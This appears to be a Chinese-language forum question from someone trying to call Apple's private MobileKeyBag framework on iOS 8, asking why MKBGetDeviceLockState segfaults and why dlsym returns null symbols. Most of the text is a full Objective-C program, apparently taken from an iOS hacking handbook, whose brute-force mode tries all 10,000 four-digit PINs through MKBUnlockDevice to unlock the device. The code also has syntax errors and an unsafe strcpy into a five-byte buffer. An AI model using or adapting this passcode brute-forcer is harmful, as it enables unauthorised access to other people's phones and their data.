需要的是 ios8 arm64
/System/Library/PrivateFrameworks/MobileKeyBag.framework/MobileKeyBag 库
它是 C 类型的 所以无法 class-dump 然后我不知道怎么加载 c 类型的私有库
1静态时, 导出 MobileKeyBag 然后 加入 xcode 编译能成功的!!
有些函数能导出执行正常,有函数 MKBGetDeviceLockState 执行会报错
Segmentation fault: 11
google 下来说是 内存申请等,但是代码都不觉得有错 ios hand book 书上的代码
2动态时 就完全有错了
#define PRIVATE_PATH “/bin/MobileKeyBag.dylib” 我用jtool 导出 然后改名为 .dylib
void *kit = dlopen(PRIVATE_PATH,RTLD_LAZY);
NSString *imsi = nil;
int (*MKBGetDeviceLockState)() = dlsym(kit, "MKBGetDeviceLockState");
printf("MKBGetDeviceLockState = %d\n",MKBGetDeviceLockState);
int (*MKBDeviceUnlockedSinceBoot)() = dlsym(kit, "MKBDeviceUnlockedSinceBoot");
printf("MKBDeviceUnlockedSinceBoot = %d\n",MKBDeviceUnlockedSinceBoot);
int (*MKBUnlockDevice)() = dlsym(kit, "MKBUnlockDevice");
printf("MKBUnlockDevice = %d\n",MKBUnlockDevice);
dlclose(kit);
动态执行后 就不出现了
MKBGetDeviceLockState = 0
MKBDeviceUnlockedSinceBoot = 0
MKBUnlockDevice = 0
完整代码:
```
#import <stdio.h>
#import <stdlib.h>
#import <unistd.h>
#include <dlfcn.h>
#import <Foundation/Foundation.h>
extern int MKBUnlockDevice(NSData* passcode, int flags);
extern int MKBGetDeviceLockState();
extern int MKBDeviceUnlockedSinceBoot();
void usage(char* argv0)
{
printf("usage: %s -B | -p <passcode> ]\n", argv0);
exit(EXIT_FAILURE);
}
int try_unlock(const char* passcode)
{
int ret;
NSString* nssPasscode = [NSString alloc] initWithCString:passcode];
NSData* nsdPasscode = [nssPasscode dataUsingEncoding:NSUTF8StringEncoding];
ret = MKBUnlockDevice(nsdPasscode, 0);
return ret;
}
void try_passcode(const char* passcode)
{
int ret;
NSString* nssPasscode = [NSString alloc] initWithCString:passcode];
NSData* nsdPasscode = [nssPasscode dataUsingEncoding:NSUTF8StringEncoding];
ret = MKBUnlockDevice(nsdPasscode, 0);
printf("MKBUnlockDevice returned %d\n", ret);
ret = MKBGetDeviceLockState();
printf("MKBGetDeviceLockState returned %d\n", ret);
}
void get_state()
{
int ret,ret2;
// printf("MKBDeviceUnlockedSinceBoot = %d\nMKBGetDeviceLockState = %d\n",MKBDeviceUnlockedSinceBoot,MKBGetDeviceLockState);
ret = MKBDeviceUnlockedSinceBoot();
printf("MKBDeviceUnlockedSinceBoot returned %d\n", ret);
ret2 = MKBGetDeviceLockState();
printf("MKBGetDeviceLockState returned %d\n", ret2);
}
#define PRIVATE_PATH "/bin/MobileKeyBag.dylib"
int main(int argc, char* argv])
{
char c;
int i, mode = 0;
char passcode[5];
int ret;
void *kit = dlopen(PRIVATE_PATH,RTLD_LAZY);
NSString *imsi = nil;
int (*MKBGetDeviceLockState1)() = dlsym(kit, "MKBGetDeviceLockState");
printf("MKBGetDeviceLockState1 = %d\n",MKBGetDeviceLockState1);
int (*MKBDeviceUnlockedSinceBoot1)() = dlsym(kit, "MKBDeviceUnlockedSinceBoot");
printf("MKBDeviceUnlockedSinceBoot1 = %d\n",MKBDeviceUnlockedSinceBoot1);
int (*MKBUnlockDevice1)() = dlsym(kit, "MKBUnlockDevice");
printf("MKBUnlockDevice1 = %d\n",MKBUnlockDevice1);
dlclose(kit);
c = getopt(argc, argv, "p:B");
switch (c) {
case 'p': // Try given passcode
mode = 1;
strcpy(passcode, strdup(optarg));
printf("passcode = %s\n",passcode);
break;
case 'B': // brute force mode
mode = 2;
break;
default:
usage(argv[0]);
}
switch (mode) {
case 0: // Just show state
printf("Just show state\n");
get_state();
break;
case 1: // Try a given passcode
printf("Try a given passcode\n");
get_state();
try_passcode(passcode);
get_state();
break;
case 2: // Brute force numeric passcode
printf("Brute force numeric passcode\n");
get_state();
for (i = 0; i < 10000; i++) {
char pc[5];
sprintf(pc, "%.4d", i);
printf("%s",pc);
if (try_unlock(pc) == 0) {
printf("Success! PINCODE %s\n", pc);
break;
}
}
break;
}
return 0;
}
```